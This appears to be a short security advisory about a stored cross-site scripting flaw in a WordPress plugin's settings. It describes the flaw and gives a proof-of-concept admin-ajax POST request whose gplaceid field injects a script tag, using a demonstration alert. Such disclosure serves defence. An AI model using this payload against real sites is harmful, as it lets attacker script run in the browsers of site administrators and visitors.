The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
X-Requested-With: XMLHttpRequest
Referer: http://example.com/wp-admin/admin.php?page=wp_google-googlecrawl
Cookie: [admin+]
Connection: close
action=wpfbr_crawl_placeid&gplaceid="><script>alert(/xss/);</script><"&_ajax_nonce=<nonce key>